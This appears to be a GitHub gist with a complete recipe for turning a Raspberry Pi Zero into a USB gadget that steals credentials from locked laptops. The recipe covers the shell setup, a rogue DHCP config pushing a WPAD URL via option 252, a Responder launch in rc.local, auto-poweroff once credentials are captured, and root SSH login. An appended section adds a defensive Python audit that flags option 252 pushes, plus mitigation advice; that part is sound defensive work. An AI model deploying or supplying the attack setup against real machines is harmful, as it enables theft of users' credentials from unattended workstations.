@milo2012
Last active December 1, 2021 11:58
Snagging creds from locked machines (for Raspberry Pi Zero)
##An update to Snagging Creds From Locked Machines from https://room362.com/post/2016/snagging-creds-from-locked-machines/.
##Installation on Raspberry Pi Zero
##Download Raspbian Jessie Lite from https://www.raspberrypi.org/downloads/raspbian/
##Use Pi Filler to write the image to the MicroSD card
##Follow Step 1) in https://learn.adafruit.com/turning-your-raspberry-pi-zero-into-a-usb-gadget/ethernet-gadget so that the Raspberry Pi Zero enumerates as a USB NIC (Ethernet gadget)
$ cd /pentest
$ apt-get install -y python git python-pip python-dev screen sqlite3
$ pip install pycrypto
$ git clone https://github.com/lgandx/Responder
$ apt-get install inotify-tools
$ aptitude -y install isc-dhcp-server
##Change PermitRootLogin value to 'Yes'
$ nano /etc/ssh/sshd_config
PermitRootLogin yes
$ nano /etc/network/interfaces
auto usb0
allow-hotplug usb0
iface usb0 inet static
address 192.168.2.201
netmask 255.255.255.0
gateway 192.168.2.1
$ nano /etc/dhcp/dhcpd.conf
ddns-update-style none;
option domain-name "domain.local";
option domain-name-servers 192.168.2.201;
default-lease-time 60;
max-lease-time 72;
authoritative;
log-facility local7;
option local-proxy-config code 252 = text;
subnet 192.168.2.0 netmask 255.255.255.0 {
range 192.168.2.1 192.168.2.2;
option routers 192.168.2.201;
option local-proxy-config "http://192.168.2.201/wpad.dat";
}
$ /etc/init.d/dhcpcd restart
$ nano /etc/rc.local
#!/bin/sh -e
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases
/usr/sbin/dhcpd
/usr/bin/screen -dmS responder bash -c 'cd /pentest/Responder/; python Responder.py -I usb0 -f -w -r -d -F -P'
/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /pentest/Responder/Responder.db; do poweroff; done'
#/usr/bin/screen -dmS checkStatus bash -c 'cd /pentest; python checkStatus.py'
exit 0
$ nano /root/.screenrc
# Logging
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log
$ nano /pentest/checkStatus.py
import os
import glob
import time

# Poll Responder's log directory once a second. led0 on the Pi Zero is the ACT LED;
# writing 1 to its brightness file turns it off (the LED is active-low on this board).
while True:
    fileList = glob.glob('/pentest/Responder/logs/*.txt')
    if len(fileList) > 0:
        # Responder has written a log file: change the LED state, then shut down cleanly
        os.system("echo 1 | sudo tee /sys/class/leds/led0/brightness")
        os.system("poweroff")
    else:
        os.system("echo 0 | sudo tee /sys/class/leds/led0/brightness")
    time.sleep(1)
##Plug the Raspberry Pi Zero into the laptop using the Micro USB cable.
##Responder will attempt to capture the credentials.
##The LED on the Raspberry Pi turns off when credentials are captured.
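The setting that makes this work is the dhcpd.conf block above pushing a WPAD URL through DHCP option 252 (declared there as local-proxy-config): a client that honours proxy auto-detection on any newly attached NIC fetches wpad.dat from the Pi. The following added example (not part of the gist, and not Responder's or isc-dhcp-server's code) is a small defender-side check that parses an ISC dhcpd.conf-style text, reports every scope that pushes option 252 and the URL it points at, so a config audit or a captured DHCP offer converted to this shape can be flagged. The sample configuration is constructed to mirror the gist's file; the function names are this example's own.

```python
import re

# Constructed sample, shaped like the gist's dhcpd.conf (not a real deployment).
SAMPLE_DHCPD_CONF = """\
ddns-update-style none;
option domain-name "domain.local";
option domain-name-servers 192.168.2.201;
authoritative;
option local-proxy-config code 252 = text;
subnet 192.168.2.0 netmask 255.255.255.0 {
  range 192.168.2.1 192.168.2.2;
  option routers 192.168.2.201;
  option local-proxy-config "http://192.168.2.201/wpad.dat";
}
"""

# Constructed sample with no WPAD push at all, for the negative case.
SAMPLE_CLEAN_CONF = """\
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.10 10.0.0.50;
  option routers 10.0.0.1;
}
"""

SUBNET_RE = re.compile(r'subnet\s+(\S+)\s+netmask\s+(\S+)\s*\{(.*?)\}', re.S)


def find_wpad_option_names(conf):
    """Return the set of option names declared as DHCP option code 252 (WPAD)."""
    return set(re.findall(r'option\s+([\w-]+)\s+code\s+252\s*=\s*text\s*;', conf))


def find_wpad_pushes(conf):
    """Return (scope, url) pairs for every place option 252 is handed to clients.

    scope is "network/netmask" for a subnet block, or "global" for a push
    outside any subnet block.
    """
    names = find_wpad_option_names(conf)
    if not names:
        return []
    alternatives = "|".join(re.escape(n) for n in sorted(names))
    # A push looks like: option <name> "http://.../wpad.dat";
    push_re = re.compile(r'option\s+(?:%s)\s+"([^"]*)"\s*;' % alternatives)

    hits = []
    for m in SUBNET_RE.finditer(conf):
        network, netmask, body = m.groups()
        for url in push_re.findall(body):
            hits.append(("%s/%s" % (network, netmask), url))

    # Anything left after removing subnet blocks is global scope.
    global_text = SUBNET_RE.sub("", conf)
    for url in push_re.findall(global_text):
        hits.append(("global", url))
    return hits


def audit(conf):
    """Produce one human-readable finding per option 252 push."""
    return ["WPAD URL %s pushed via DHCP option 252 in scope %s" % (url, scope)
            for scope, url in find_wpad_pushes(conf)]


if __name__ == "__main__":
    for line in audit(SAMPLE_DHCPD_CONF) or ["no option 252 push found"]:
        print(line)
```

A hit here is the signal a blue team wants from a DHCP server it did not provision; on the client side the corresponding mitigation is to stop trusting proxy auto-detection on arbitrary interfaces (turn off "Automatically detect settings" / WPAD via policy) and to restrict which USB network devices a locked workstation will bring up.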